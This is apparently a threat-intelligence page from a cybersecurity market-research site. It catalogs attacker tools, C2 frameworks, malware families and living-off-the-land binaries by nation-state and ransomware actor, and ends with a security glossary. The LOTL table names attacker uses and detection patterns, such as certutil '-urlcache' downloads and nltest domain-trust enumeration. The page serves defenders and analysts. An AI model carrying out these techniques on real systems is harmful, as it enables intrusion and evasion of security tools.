Attacker Tool & Framework Catalog¶

Catalog at a Glance

This page aggregates 75+ attacker tools, frameworks, and malware families identified across all threat actor deep-dives into a unified cross-cutting reference. Key findings:

Cobalt Strike remains the single most widely adopted tool, used by every nation-state actor category (China, Russia, DPRK, Iran) and the entire ransomware ecosystem
~60% of tools observed in modern intrusions are commodity, open-source, or living-off-the-land --- custom malware is increasingly reserved for high-value targets and later kill chain phases
Top 5 tools by actor adoption: Cobalt Strike, Mimikatz, PowerShell (LOTL), Impacket, PsExec
Tool convergence is accelerating: nation-state actors increasingly adopt the same commodity/OSS frameworks used by cybercriminals, complicating attribution

Cross-references: Kill Chain Analysis | Defensive Gap Analysis | Research Opportunities

1. Tool Taxonomy¶

The attacker tooling ecosystem spans eight functional categories, from initial exploitation through persistence and defense evasion.

mindmap
  root((Attacker<br/>Tool Taxonomy))
    Exploit Frameworks
      Metasploit
      Custom zero-day exploits
      Browser exploit kits
    C2 Frameworks
      Cobalt Strike
      Brute Ratel C4
      Sliver
      Mythic
      Custom implants
    Post-Exploitation
      Mimikatz
      Impacket
      BloodHound
      PowerSploit
    Credential Access
      LaZagne
      HYPERSCRAPE
      Kerberoasting tools
      Browser stealers
    Lateral Movement
      PsExec
      WMI/WMIC
      RDP abuse
      SSH tunneling
    Defense Evasion
      BYOVD tools
      DLL side-loading
      Process injection
      Timestomping
    Reconnaissance
      SharpHound
      Network scanners
      Cloud enumeration
    Loaders & Droppers
      QakBot
      IcedID
      Emotet
      BumbleBee

2. Master Tool Catalog¶

Exploit Frameworks¶

Tool	Type	Known Users	First Seen	Status
Metasploit	Commodity / OSS	All actor categories	2003	Active
Custom zero-day exploits (Ivanti, Fortinet, Citrix)	Custom	China (Volt Typhoon, APT31, APT5), Iran	Ongoing	Active
MOVEit / GoAnywhere exploits	Custom (0-day)	Ransomware (Cl0p / FIN11)	2023	Active
ProxyLogon / ProxyShell chains	Commodity (1-day)	China (Hafnium), Iran, Ransomware	2021	Declining

C2 Frameworks¶

Tool	Type	Known Users	First Seen	Status
Cobalt Strike	Commodity (leaked/cracked)	China, Russia, DPRK, Iran, Ransomware --- virtually universal	2012	Active
Brute Ratel C4	Commodity	Ransomware affiliates (Black Basta, BlackCat), some nation-state	2022	Active
Sliver	Open-source	Growing adoption across all actor types; Russia (APT29), Ransomware	2020	Rising
Mythic	Open-source	Red teams transitioning to adversary adoption; early nation-state use	2020	Rising
ShadowPad	Shared (PRC ecosystem)	China --- APT41, Winnti, RedFoxtrot, Earth Lusca, 15+ PRC groups	2017	Active
X-Agent / XTunnel	Custom	Russia --- APT28 / GRU Unit 26165	2014	Active
Snake	Custom	Russia --- Turla / FSB Center 18	2003	Disrupted (2023 FBI takedown)

Post-Exploitation & Credential Access¶

Tool	Type	Known Users	First Seen	Status
Mimikatz	Commodity / OSS	All actor categories --- universal adoption	2011	Active
Rubeus	Open-source	Ransomware affiliates, red teams, Kerberoasting/AS-REP roasting	2018	Active
SharpHound / BloodHound	Open-source	Ransomware, nation-state actors --- AD enumeration	2016	Active
Impacket	Commodity / OSS	All actor categories --- Python toolkit for SMB, WMI, Kerberos attacks	2012	Active
PowerSploit	Commodity / OSS	Broad adoption, declining in favor of newer tools	2012	Declining
LaZagne	Open-source	Iran (MuddyWater, OilRig), Ransomware	2015	Active
HYPERSCRAPE	Custom	Iran --- APT35 / Charming Kitten email harvesting	2022	Active
Browser credential stealers	Custom / Commodity	DPRK (Qilin, Chrome targeting), info-stealer malware ecosystem	2020+	Rising

Lateral Movement¶

Tool	Type	Known Users	First Seen	Status
PsExec	LOTL (Sysinternals)	All actor categories --- universal	1999	Active
WMI / WMIC	LOTL	All actor categories --- universal	Native	Active
SMBExec	Commodity / OSS	Ransomware, Russia	2013	Active
RDP (Remote Desktop Protocol)	LOTL	All actor categories --- primary lateral movement vector for Ransomware	Native	Active
SSH tunneling	LOTL	China (Volt Typhoon), DPRK, Russia	Native	Active

Defense Evasion¶

Tool	Type	Known Users	First Seen	Status
Terminator (BYOVD)	Commodity (sold on forums)	Ransomware affiliates, DPRK	2023	Rising
AuKill (BYOVD)	Commodity	Ransomware (Black Basta, Medusa)	2023	Rising
Backstab (BYOVD)	Open-source	Ransomware, DPRK	2022	Active
DLL side-loading	Technique	China --- primary evasion technique across 15+ PRC groups	2010+	Active
Process injection (various)	Technique	All actor categories	Ongoing	Active
Timestomping	Technique	China, Russia	Ongoing	Active

Loaders & Droppers¶

Tool	Type	Known Users	First Seen	Status
QakBot / QBot	Commodity (MaaS)	Ransomware ecosystem (Black Basta, REvil)	2007	Disrupted (2023), partially resurfaced
IcedID / BokBot	Commodity (MaaS)	Ransomware ecosystem (Conti successors)	2017	Declining
Emotet	Commodity (MaaS)	Ransomware ecosystem (historically Conti/Ryuk)	2014	Disrupted multiple times, intermittent
BumbleBee	Commodity (MaaS)	Ransomware ecosystem (Conti successors, replaced BazarLoader)	2022	Active
PlugX / Korplug	Shared (PRC ecosystem)	China --- used by 15+ PRC groups (APT10, APT41, Mustang Panda, etc.)	2008	Active

Custom Malware Families¶

Malware	Origin	Category	Known Users	Notable For
ShadowPad	China	Modular backdoor	APT41, Winnti, RedFoxtrot, Earth Lusca	Shared across PRC groups; modular plugin architecture
PlugX / Korplug	China	RAT	15+ PRC groups	Longest-running PRC implant; still actively developed
China Chopper	China	Web shell	APT40, APT41, Hafnium	4KB web shell; trivial to deploy, hard to detect
Winnti	China	Kernel-level backdoor	Winnti Group / APT41	Kernel rootkit with supply chain deployment
NotPetya	Russia	Wiper (disguised as ransomware)	Sandworm / GRU Unit 74455	$10B+ in global damage; most destructive cyberattack to date
Industroyer / CrashOverride	Russia	ICS malware	Sandworm / GRU Unit 74455	Directly manipulates power grid protocols (IEC 61850, IEC 104)
SUNBURST	Russia	Supply chain backdoor	APT29 / SVR (Cozy Bear)	SolarWinds compromise; 18,000 organizations received trojanized update
FoggyWeb / MagicWeb	Russia	AD FS backdoor	APT29 / SVR	Targets identity infrastructure; steals tokens and certificates
AppleJeus	DPRK	Crypto-targeting trojan	Lazarus Group	Trojanized cryptocurrency trading applications
FASTCash	DPRK	ATM manipulation	Lazarus Group / BeagleBoyz	Intercepts ISO 8583 transaction messages on payment switches
Shamoon (Disttrack)	Iran	Wiper	APT33 / Elfin	Destroyed 35,000 Saudi Aramco workstations (2012)
BiBi Wiper	Iran	Wiper (Linux/Windows)	Void Manticore / MOIS-linked	Named after Israeli PM; deployed post-October 2023

3. Shared Tooling Analysis¶

Attribution Collapse: When Everyone Uses the Same Tools

The dominance of commodity and open-source tooling in modern intrusions has fundamentally undermined tool-based attribution. When a defender finds Cobalt Strike, Mimikatz, and Impacket on a compromised host, the attacker could be any of the following:

A PRC espionage team conducting IP theft
A GRU unit pre-positioning in critical infrastructure
A ransomware affiliate preparing to deploy an encryptor
A red team running an authorized assessment

This convergence forces threat intelligence teams to rely on behavioral analysis, infrastructure patterns, victimology, and geopolitical context rather than tool artifacts for attribution --- a significantly higher analytical bar.

The Supply Chain of Attacker Tooling¶

The attacker tooling ecosystem has its own supply chain dynamics:

Leaked tools: Cobalt Strike source code leaked in 2020; cracked versions distributed freely. Brute Ratel C4 was cracked and leaked within months of gaining traction. Each leak permanently expands the attacker toolkit available to lower-skill actors.
Open-source proliferation: Tools like Sliver, Mythic, and Havoc are developed openly on GitHub. While created for legitimate red team use, they are immediately available to adversaries with no licensing friction.
Forum-sold tooling: BYOVD tools (Terminator, AuKill), custom packers, and EDR bypass kits are sold on Russian-language forums (XSS, Exploit) for $300--$5,000.
Malware-as-a-Service loaders: QakBot, IcedID, BumbleBee, and Emotet operated as commercial services providing initial access to paying customers --- primarily ransomware affiliates.

This supply chain means that a disruption at any single tool only temporarily degrades attacker capability. When QakBot was taken down in August 2023, ransomware affiliates shifted to IcedID, BumbleBee, and Pikabot within weeks.

The Cobalt Strike Problem¶

Cobalt Strike exemplifies the "shared tooling" challenge. Originally a legitimate red team tool, cracked and leaked versions have proliferated since approximately 2020. Fortra (the vendor) and law enforcement have attempted takedowns of pirated Cobalt Strike infrastructure, but the tool remains ubiquitous across the threat landscape.

Estimated 70%+ of targeted intrusions in 2024 involved Cobalt Strike at some phase (Google TAG / VirusTotal analysis)
Fortra and Microsoft coordinated legal action in 2023 to seize infrastructure hosting cracked copies
Despite enforcement efforts, cracked builds remain freely available on underground forums

ShadowPad: China's Shared Malware Service¶

ShadowPad functions as a shared malware platform across PRC-linked groups --- a "malware-as-a-service" for the Chinese intelligence community. First identified in supply chain attacks in 2017 (NetSarang and CCleaner compromises), it has since been adopted by at least 15 distinct PRC-attributed groups.

Modular plugin architecture allows different teams to customize functionality
Central development and distribution suggests institutional coordination across MSS and PLA cyber units
Represents a maturation of China's offensive cyber program toward shared infrastructure and reduced duplication (Recorded Future, 2023; PwC Threat Intelligence, 2022)

Tool Convergence Trend¶

Nation-state actors are increasingly adopting commodity and open-source tools that were historically associated with cybercriminals:

Trend	Evidence	Implication
Nation-state adoption of OSS C2	APT29 using Sliver; PRC groups using Cobalt Strike	Blurred line between state and criminal TTPs
BYOVD going mainstream	DPRK, ransomware groups, and some PRC actors all using Terminator/AuKill	EDR bypass is commoditized
Shared loader ecosystem	Ransomware groups rotate through QakBot, IcedID, BumbleBee as each is disrupted	Loader supply chain is resilient and modular

4. LOTL Binary Catalog¶

Living-off-the-land (LOTL) techniques use legitimate system binaries and administrative tools for malicious purposes, blending attacker activity with normal operations.

Binary	Legitimate Purpose	Attacker Use	Known Abusers	Detection Approach
PowerShell	Scripting, automation	Download cradles, fileless execution, reconnaissance	All actors --- universal	Script block logging, AMSI, constrained language mode
cmd.exe	Command interpreter	Batch execution, chained commands	All actors	Command-line logging, parent-child process analysis
certutil	Certificate management	File download, Base64 encode/decode	China (Volt Typhoon), Ransomware	Flag `-urlcache` and `-decode` usage
mshta	HTML Application host	Execute HTA payloads, bypass application controls	Iran (MuddyWater), Ransomware	Monitor mshta.exe spawning child processes
rundll32	DLL execution	Load malicious DLLs, proxy execution	China, Russia, Ransomware	Unusual DLL paths, command-line arguments
regsvr32	COM registration	Proxy execution, AppLocker bypass	Iran, Ransomware	Scrobj.dll usage, network connections from regsvr32
wmic	WMI client	Remote execution, reconnaissance, lateral movement	All actors --- universal	Process creation via WMI, unusual WMIC queries
bitsadmin	Background transfer	File download, persistence	China, DPRK	Non-standard transfer jobs, unusual source URLs
net.exe / net1.exe	Network configuration	Account enumeration, group discovery	All actors	Bulk net user/net group commands in sequence
nltest	Domain controller query	Domain trust enumeration	Ransomware, Russia	nltest /dclist, /domain_trusts usage

The Fundamental LOTL Detection Challenge

LOTL techniques represent one of the hardest unsolved problems in defensive security. Every binary listed above has legitimate daily use by system administrators, automation scripts, and enterprise management tools. The attacker's commands are syntactically identical to benign ones.

Traditional signature-based and even basic behavioral detection fails because:

The binary is signed by Microsoft and inherently trusted
Application allowlists explicitly permit these tools
Volume of legitimate use creates overwhelming noise
Context (who, when, why) is the only discriminant --- and most security tools lack it

This is the core reason China's Volt Typhoon campaign went undetected for years in U.S. critical infrastructure: they used almost exclusively LOTL techniques, generating no malware artifacts for EDR to flag (CISA Advisory AA24-038A).

Behavioral Detection Opportunities

The LOTL detection gap creates significant market opportunity for vendors who can move beyond binary-level detection to contextual behavioral analysis:

Process lineage / causal chain analysis: Tracking parent-child-grandchild process relationships to identify anomalous execution chains (e.g., Outlook spawning PowerShell spawning certutil)
User behavior analytics (UBA): Baseline per-user command patterns; flag deviations (a developer account suddenly running nltest and net group commands)
Temporal clustering: Detect sequences of LOTL commands that individually appear benign but collectively map to attack patterns (e.g., whoami, net user, nltest, wmic within a 5-minute window)
Cross-host correlation: A single LOTL command on one host is invisible; the same command running across 50 hosts in sequence is lateral movement

See Research Opportunities for deeper analysis.

5. Tool Evolution Trends¶

Custom Malware in Decline for Initial Access¶

Nation-state actors increasingly use commodity tools for initial access and early kill chain phases, reserving custom malware for later-stage persistence and high-value targets. This is a deliberate tradecraft shift --- commodity tools provide plausible deniability and reduce the risk of burning expensive custom capabilities.

China post-2020: Volt Typhoon operates almost entirely with LOTL and commodity tools; custom implants are reserved for high-priority persistent access (Microsoft Threat Intelligence, 2023)
Exception: supply chain attacks still require custom implants (SUNBURST, 3CX compromise)

Commodity/OSS C2 Framework Adoption Rising¶

Framework	Trend (2023--2025)	Driver
Sliver	Rapid growth	Free, open-source, harder to signature than Cobalt Strike
Mythic	Growing	Modular agent design, multiple language support
Brute Ratel C4	Moderate growth	Designed to evade EDR; gaining ransomware adoption
Cobalt Strike	Stable but targeted	Still dominant despite takedown efforts
Havoc	Emerging	New OSS framework with evasion focus

LOTL Usage Intensifying¶

Chinese threat actors in particular have dramatically increased LOTL usage since approximately 2020, coinciding with the Volt Typhoon campaign's focus on U.S. critical infrastructure pre-positioning. This shift represents a strategic adaptation to improved Western detection of Chinese custom malware.

Pre-2020: PRC groups relied heavily on custom backdoors (PlugX, ShadowPad, China Chopper)
Post-2020: Volt Typhoon and related clusters use almost exclusively built-in Windows tools
Other actors are following: DPRK and Iran groups also increasing LOTL adoption

BYOVD Emerging as Standard EDR Bypass¶

Bring Your Own Vulnerable Driver (BYOVD) attacks --- where attackers load legitimately signed but vulnerable kernel drivers to disable security tools --- have moved from niche technique to standard ransomware playbook in 2023--2025.

Terminator tool (using a vulnerable Zemana driver) sold openly on cybercrime forums for $3,000
AuKill leverages vulnerable Process Explorer drivers to kill EDR processes
LOLDrivers project (loldrivers.io) catalogs 700+ vulnerable drivers
Microsoft's Vulnerable Driver Blocklist is the primary mitigation but adoption is inconsistent

BYOVD Commoditization

BYOVD has reached the point where no specialized skill is required --- turnkey tools are available for purchase on forums. This effectively commoditizes kernel-level EDR bypass, undermining the detection layer that most enterprises rely on as their primary defense. Every EDR vendor must now defend against the operating system's own driver trust model.

Cloud-Native Tooling in Attacks¶

As enterprises migrate to cloud, attackers are following with cloud-native techniques:

Azure CLI, AWS CLI, gcloud: Used for cloud reconnaissance, privilege escalation, and data exfiltration
Azure AD / Entra ID abuse: Token theft, OAuth app abuse, consent phishing
Cloud-specific tools: ROADtools (Azure AD enumeration), Pacu (AWS exploitation framework), ScoutSuite
Russia (APT29) and DPRK are the most active cloud-targeting nation-state actors

Knowledge Gap

Cloud-native attacker tooling is evolving rapidly and our catalog likely underrepresents the current state. Tool adoption in cloud environments is less visible to traditional threat intelligence collection methods, which are weighted toward endpoint and network telemetry.

Cross-Platform Malware Rising¶

Malware written in Rust and Go is increasing across all actor categories, enabling single-codebase targeting of Windows, Linux, and macOS:

Royal/BlackSuit ransomware: Rust-based encryptor targeting both Windows and Linux/ESXi
BlackCat/ALPHV: First major ransomware written in Rust (2021)
Sliver, Mythic agents: Go-based, inherently cross-platform
DPRK loaders: Multiple DPRK campaigns now use Go-based initial access tools

Defensive Product Implications of Tool Trends

Each trend above creates specific product and investment opportunities:

Trend	Defensive Product Need	Market Segment
LOTL dominance	Behavioral analytics, process lineage tracking	SIEM & SOAR, Endpoint
BYOVD commoditization	Kernel-level integrity monitoring, driver allowlisting	Endpoint
OSS C2 proliferation	Network traffic analysis tuned to Sliver/Mythic/Havoc protocols	Network Security, NDR
Cloud-native attacks	CSPM/CIEM with attack path modeling	Cloud Security, Identity
Cross-platform malware	Unified detection across Windows, Linux, macOS, containers	Endpoint, Cloud Security
Loader ecosystem resilience	Email/web gateway detection of novel loader variants	Email Security

Tool Disruption Effectiveness¶

Law enforcement and vendor actions have had mixed results against the attacker tooling supply chain:

Action	Target	Year	Outcome
FBI Operation Duck Hunt	QakBot infrastructure	2023	Temporarily effective; partial resurfacing within months
Europol Operation Endgame	IcedID, SystemBC, Pikabot, SmokeLoader, BumbleBee	2024	Significant disruption; ecosystem adapted to alternatives
Fortra / Microsoft legal action	Cracked Cobalt Strike	2023	Reduced some infrastructure; cracked copies still widely available
FBI Operation MEDUSA	Turla's Snake malware	2023	Successful disruption of 20-year-old implant network
ODNI/Five Eyes attribution	Volt Typhoon LOTL TTPs	2024	Awareness raised; detection remains fundamentally difficult

The pattern is clear: disruption works best against centralized infrastructure (C2 servers, loader botnets) and works poorly against distributed knowledge (LOTL techniques, open-source tools, leaked source code). This asymmetry favors continued attacker adoption of decentralized, commodity tooling.

6. Sources¶

MITRE ATT&CK --- Software and Tools: https://attack.mitre.org/software/
Google TAG Cobalt Strike abuse analysis: https://blog.google/threat-analysis-group/google-tag-efforts-to-counter-cobalt-strike-abuse/
CISA Advisory AA24-038A --- PRC State-Sponsored Actors (Volt Typhoon): https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a
Microsoft Threat Intelligence --- Volt Typhoon LOTL analysis (2023): https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/
Recorded Future --- ShadowPad malware analysis: https://www.recordedfuture.com/research/shadowpad-malware-analysis
PwC Threat Intelligence --- ShadowPad technical report (2022): https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/shadow-pad.html
LOLDrivers Project --- Vulnerable driver catalog: https://www.loldrivers.io/
CrowdStrike Global Threat Report 2024: https://www.crowdstrike.com/global-threat-report/
Mandiant APT Groups reference: https://www.mandiant.com/resources/insights/apt-groups
Chainalysis --- Crypto hacking and stolen funds 2025: https://www.chainalysis.com/blog/crypto-hacking-stolen-funds-2025/
LOLBAS Project --- Living Off The Land Binaries, Scripts and Libraries: https://lolbas-project.github.io/
Fortra / Microsoft coordinated legal action against Cobalt Strike abuse (2023): https://www.fortra.com/newsroom/fortra-takes-legal-action-against-illegal-cobalt-strike-use

Glossary¶

This glossary defines the acronyms and key terms used throughout the cybersecurity market research site. Use it as a quick reference when navigating segment analyses, pain-point discussions, and opportunity assessments.

A¶

Term	Definition
ACL	Access Control List: rules determining which users/systems can access resources
APT	Advanced Persistent Threat: a prolonged, targeted cyberattack where an intruder gains and maintains unauthorized access
ASM	Attack Surface Management: continuous discovery, inventory, and risk assessment of an organization's external-facing assets
ASPM	Application Security Posture Management: unified visibility and risk management across the application lifecycle
AV	Antivirus: software designed to detect, prevent, and remove malware

B¶

Term	Definition
BAS	Breach and Attack Simulation: automated tools that simulate real-world attacks to test security controls
BEC	Business Email Compromise: a social-engineering attack targeting employees with access to company finances or data
BYOVD	Bring Your Own Vulnerable Driver: attack technique where adversaries load a legitimately signed but vulnerable kernel driver to disable security tools

C¶

Term	Definition
C2	Command and Control: infrastructure used by attackers to communicate with compromised systems
CASB	Cloud Access Security Broker: a security policy enforcement point between cloud consumers and providers
CCPA	California Consumer Privacy Act: California state law granting consumers rights over their personal data
CIAM	Customer Identity and Access Management: managing and securing external customer identities and authentication
CIEM	Cloud Infrastructure Entitlement Management: managing identities and privileges in cloud environments
CTEM	Continuous Threat Exposure Management: a program for continuously assessing and prioritizing threat exposures
CNAPP	Cloud-Native Application Protection Platform: integrated security for cloud-native applications across the full lifecycle
CSPM	Cloud Security Posture Management: continuous monitoring of cloud infrastructure for misconfigurations and compliance risks
CWPP	Cloud Workload Protection Platform: security for workloads running in cloud environments (VMs, containers, serverless)
CVE	Common Vulnerabilities and Exposures: a standardized identifier for publicly known cybersecurity vulnerabilities

D¶

Term	Definition
DAST	Dynamic Application Security Testing: testing a running application for vulnerabilities by simulating attacks
DCS	Distributed Control System: a control system for managing industrial processes across multiple locations
DLP	Data Loss Prevention: tools and processes to prevent unauthorized data exfiltration or leakage
DORA	Digital Operational Resilience Act: EU regulation on ICT risk management for financial entities
DSPM	Data Security Posture Management: discovering, classifying, and protecting sensitive data across cloud environments

E¶

Term	Definition
EASM	External Attack Surface Management: discovering and monitoring internet-facing assets for exposures
EDR	Endpoint Detection and Response: tools that monitor endpoints for threats and provide investigation and response capabilities
EPP	Endpoint Protection Platform: integrated endpoint security combining prevention, detection, and response

F/G¶

Term	Definition
FAIR	Factor Analysis of Information Risk: a quantitative model for understanding, analyzing, and measuring information risk
GRC	Governance, Risk, and Compliance: integrated framework for aligning IT with business goals, managing risk, and meeting regulations
GDPR	General Data Protection Regulation: EU regulation on data protection and privacy for individuals

H¶

Term	Definition
HIPAA	Health Insurance Portability and Accountability Act: US law governing the privacy and security of health information

I¶

Term	Definition
IAB	Initial Access Broker: specialized cybercriminals who compromise networks and sell access to ransomware operators and other buyers
IAM	Identity and Access Management: framework for managing digital identities and controlling access to resources
ICS	Industrial Control System: control systems used in industrial production and critical infrastructure
IDS	Intrusion Detection System: a system that monitors network traffic for suspicious activity and alerts
ITDR	Identity Threat Detection and Response: detecting and responding to identity-based attacks and compromises
IoT	Internet of Things: network of physical devices embedded with sensors, software, and connectivity
IPS	Intrusion Prevention System: a system that monitors and actively blocks detected threats in network traffic

L¶

Term	Definition
LOLBin	Living Off the Land Binary: a legitimate system binary that can be abused by attackers for malicious purposes such as downloading payloads, executing code, or bypassing security controls
LOTL	Living Off the Land: attack technique using legitimate, pre-installed system tools and binaries rather than custom malware to evade detection

M¶

Term	Definition
MaaS	Malware-as-a-Service: cybercrime business model where malware developers sell or rent their tools to other criminals
MDR	Managed Detection and Response: outsourced security service providing 24/7 threat monitoring, detection, and response
MITRE ATT&CK	MITRE Adversarial Tactics, Techniques, and Common Knowledge: a knowledge base of adversary behaviors and techniques
MSSP	Managed Security Service Provider: a third-party provider offering outsourced monitoring and management of security devices
MFA	Multi-Factor Authentication: requiring two or more verification factors to gain access to a resource

N¶

Term	Definition
NDR	Network Detection and Response: detecting and responding to threats by analyzing network traffic patterns
NERC CIP	North American Electric Reliability Corporation Critical Infrastructure Protection: security standards for the electric grid
NGAV	Next-Generation Antivirus: advanced antivirus using behavioral analysis, AI, and machine learning beyond signature-based detection
NIS2	Network and Information Systems Directive 2: updated EU directive on cybersecurity for essential and important entities
NIST CSF	National Institute of Standards and Technology Cybersecurity Framework: a voluntary framework for managing cybersecurity risk

O¶

Term	Definition
ORB	Operational Relay Box: compromised network devices (typically SOHO routers or IoT devices) used by threat actors as proxy infrastructure for command and control traffic
OT	Operational Technology: hardware and software that monitors and controls physical devices and processes
OWASP	Open Worldwide Application Security Project: a nonprofit focused on improving software security through open-source projects and guidance

P¶

Term	Definition
PAM	Privileged Access Management: securing, managing, and monitoring privileged accounts and access
PCI DSS	Payment Card Industry Data Security Standard: security standards for organizations that handle credit card data
PII	Personally Identifiable Information: any data that could identify a specific individual
PLC	Programmable Logic Controller: an industrial computer used to control manufacturing processes

R¶

Term	Definition
RaaS	Ransomware-as-a-Service: cybercrime business model where ransomware operators provide malware and infrastructure to affiliates who conduct attacks, splitting profits
RGB	Reconnaissance General Bureau: North Korea's primary intelligence agency responsible for clandestine operations including cyber operations

S¶

Term	Definition
SASE	Secure Access Service Edge: converged network and security-as-a-service architecture delivered from the cloud
SAST	Static Application Security Testing: analyzing source code for vulnerabilities without executing the application
SBOM	Software Bill of Materials: a formal inventory of components, libraries, and dependencies in a software product
SCA	Software Composition Analysis: identifying open-source components and known vulnerabilities in a codebase
SCADA	Supervisory Control and Data Acquisition: a system for monitoring and controlling industrial processes remotely
SD-WAN	Software-Defined Wide Area Network: a virtual WAN architecture that simplifies branch networking and optimizes traffic
SEG	Secure Email Gateway: a solution that filters inbound and outbound email to block threats and enforce policies
SIEM	Security Information and Event Management: aggregating and analyzing log data for threat detection and compliance
SOAR	Security Orchestration, Automation, and Response: tools that automate and coordinate security operations workflows
SOC	Security Operations Center: a centralized team and facility for monitoring, detecting, and responding to security incidents
SOX	Sarbanes-Oxley Act: US law mandating financial reporting and internal control requirements for public companies
SSE	Security Service Edge: the security component of SASE, delivering SWG, CASB, and ZTNA as cloud services
SWG	Secure Web Gateway: a solution that filters web traffic to enforce security policies and block threats

T¶

Term	Definition
TAM	Total Addressable Market: the total revenue opportunity available for a product or service
TCO	Total Cost of Ownership: the complete cost of acquiring, deploying, and operating a solution over its lifetime
TIP	Threat Intelligence Platform: a system for aggregating, correlating, and operationalizing threat intelligence data
TLS	Transport Layer Security: a cryptographic protocol that provides secure communication over a network
TTP	Tactics, Techniques, and Procedures: the patterns of behavior and methods used by threat actors to conduct cyber operations

V¶

Term	Definition
VM	Vulnerability Management: the ongoing process of identifying, evaluating, treating, and reporting security vulnerabilities

X¶

Term	Definition
XDR	Extended Detection and Response: unified threat detection and response across endpoints, network, cloud, and email

Z¶

Term	Definition
ZTNA	Zero Trust Network Access: a security model that grants access based on identity verification and least-privilege principles